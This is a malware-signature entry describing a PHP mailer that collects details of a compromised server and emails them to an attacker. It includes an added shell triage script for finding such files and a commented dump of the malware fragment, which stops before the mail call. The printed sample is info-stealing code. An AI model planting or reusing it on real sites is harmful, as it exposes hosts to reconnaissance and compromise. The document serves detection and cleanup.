Malware Signatures

php.mailer.phpinfo.001

PHP mailers are, as the name suggests, scripts that send e-mail using PHP's mail functions. CMSs like WordPress, Joomla or Magento have built-in functions to send e-mail. Malware authors, however, drop their own specially crafted scripts to send messages. Such scripts are used for sending spam and phishing e-mail, flooding mailboxes, or collecting sensitive data and sending it back to the attacker.
PHP mailers are often part of spam bots and other malware, or are used to send sensitive data back to attackers. They typically receive the recipient addresses and other parameters through POST requests.
php.mailer.phpinfo differs from the other variants in that it works more as an accomplice to other malware: it gathers environment information from the compromised server (current user, php_uname() output, the safe_mode setting, the script's URL and directory) and e-mails it to the attacker.

Affecting

Any vulnerable PHP-based website. Outdated software or compromised passwords can act as the infection vector.

Cleanup

Inspect your site's files for mail() calls in files you don't recognize.
Check your site's access_logs for suspicious POST requests; these can point out which files are being used to send the unwanted messages.
You can also sign up with us and let our team remove the malware for you.
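The two cleanup steps above, run over a constructed sample site and access log, as an added example that is not code from this page or from Sucuri. It assumes a WordPress document root (so wp-includes/ and wp-admin/ are treated as known paths, and wp-login.php, xmlrpc.php, wp-cron.php, wp-comments-post.php and wp-admin/ as legitimate POST endpoints) and a combined-format access log; the file names, IP addresses and log lines are made up for the demonstration:

```shell
#!/bin/sh
# Added example, not code from the signature page: helpers for the two cleanup
# steps (find mail() calls in files you do not recognise, then find POST requests
# to scripts that should not receive POSTs). Everything it touches is constructed
# under a temporary directory so it runs offline.
# Assumptions: a WordPress document root (core paths wp-includes/ and wp-admin/ are
# treated as known) and an Apache/Nginx combined-format access log.
set -u

WORK="${TMPDIR:-/tmp}/mailer-triage.$$"
DOCROOT="$WORK/htdocs"
ACCESS_LOG="$WORK/access_log"

# Bare mail( or @mail( call, not wp_mail( or some_mail( (POSIX ERE, no \s).
MAIL_CALL_RE='(^|[^A-Za-z0-9_])@?mail[[:space:]]*\('
# Core paths whose mail() wrappers are expected (assumption for a WordPress site).
KNOWN_MAIL_PATHS_RE='/(wp-includes|wp-admin)/'
# Scripts that legitimately receive POSTs on a WordPress site (assumption).
POST_ALLOW_RE='^/(wp-login\.php|xmlrpc\.php|wp-cron\.php|wp-comments-post\.php|wp-admin/)'

# Constructed sample site and log; file names and IPs are made up for the demo.
setup_samples() {
    mkdir -p "$DOCROOT/wp-content/uploads" "$DOCROOT/wp-includes"
    # Core wrapper: contains a mail() call but lives in a known path.
    printf '<?php\nfunction wp_mail($to, $s, $m) { return mail($to, $s, $m); }\n' \
        > "$DOCROOT/wp-includes/pluggable.php"
    # Dropper-style file modelled on the dump: collects host info, mails it on POST.
    printf '<?php\n$uname = @php_uname();\n$dados = "<b>Nome: </b>{$uname}";\n@mail($_POST["to"], $_SERVER["HTTP_HOST"], $dados);\n' \
        > "$DOCROOT/wp-content/uploads/info.php"
    # Ordinary file with no mail() call at all.
    printf '<?php echo "hello";\n' > "$DOCROOT/index.php"
    cat > "$ACCESS_LOG" <<'EOF'
203.0.113.7 - - [10/Mar/2020:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2020:10:12:05 +0000] "POST /wp-content/uploads/info.php HTTP/1.1" 200 21 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2020:10:13:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2020:10:14:09 +0000] "POST /wp-content/uploads/info.php?x=1 HTTP/1.1" 200 21 "-" "curl/7.68.0"
EOF
}

# Step 1: PHP files calling mail() outside the paths where that is expected.
find_mail_calls() {
    find "$DOCROOT" -type f -name '*.php' -exec grep -lE "$MAIL_CALL_RE" {} + 2>/dev/null |
        grep -vE "$KNOWN_MAIL_PATHS_RE" || :
}

# Step 2: POST targets (query string stripped) that are not known POST endpoints,
# with a hit count per path so the busiest unexpected script floats to the top.
suspicious_posts() {
    awk '$6 == "\"POST" { sub(/\?.*/, "", $7); print $7 }' "$ACCESS_LOG" |
        grep -vE "$POST_ALLOW_RE" | sort | uniq -c | sort -rn || :
}

cleanup_samples() { rm -rf "$WORK"; }

run_triage() {
    setup_samples
    echo "== PHP files calling mail() outside known paths =="
    find_mail_calls
    echo "== POST hits on scripts that should not receive POSTs =="
    suspicious_posts
    cleanup_samples
}

run_triage
```

On a real server, point DOCROOT and ACCESS_LOG at the live paths and drop the setup_samples and cleanup_samples calls. A mail() call inside wp-content/uploads/ or any other writable upload directory deserves priority, and the source address and timestamps of the POSTs should be correlated with the creation time of the file they hit.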

Dump

<?php
// Collect identifying details of the compromised host.
$user = @get_current_user();
$uname = @php_uname();
// The letters of "it is" and "Day" are date() format characters themselves, so
// the output is not the sentence the author apparently intended.
$data = date('h-i-s, j-m-y, it is w Day z');
$safemode = @ini_get('safe_mode');
$url = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
// Directory of the running script: everything before the last backslash. On a
// Linux host strrchr() finds no backslash and $caminho is the full script path.
$caminho = substr($_SERVER['SCRIPT_FILENAME'], 0, strlen($_SERVER['SCRIPT_FILENAME']) - strlen(strrchr($_SERVER['SCRIPT_FILENAME'], "\\")));

if ($safemode == '') {
    $safemode = "OFF";
} else {
    $safemode = " $SafeMode "; // $SafeMode (capitalised) is never set; the sample's own bug
}

// Report body (Portuguese names: dados = data, caminho = path, assunto = subject).
// $phpinfo is not defined anywhere in this fragment, so those two fields come out empty.
$dados  = "<b>Nome: </b>{$uname}<br>";
$dados .= "<b>Safe Mode:</b>{$phpinfo['PHP Core']['safe_mode'][0]}<br />";
$dados .= "<b>URL: </b>{$url}<br>";
$dados .= "<b>Dir: </b>{$caminho}<br>";
$dados .= "<b>System: </b>{$phpinfo['phpinfo']['System']}<br />";

$assunto = "$url";

// Headers of the outgoing report; "nao-responda" is Portuguese for "do-not-reply".
$headers  = "From: <nao-responda>\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "X-Mailer: PHP/" . phpversion() . "\r\n";
$headers .= "Message-ID: <" . md5(uniqid(time())) . "@" . $_SERVER['SERVER_NAME'] . ">\r\n";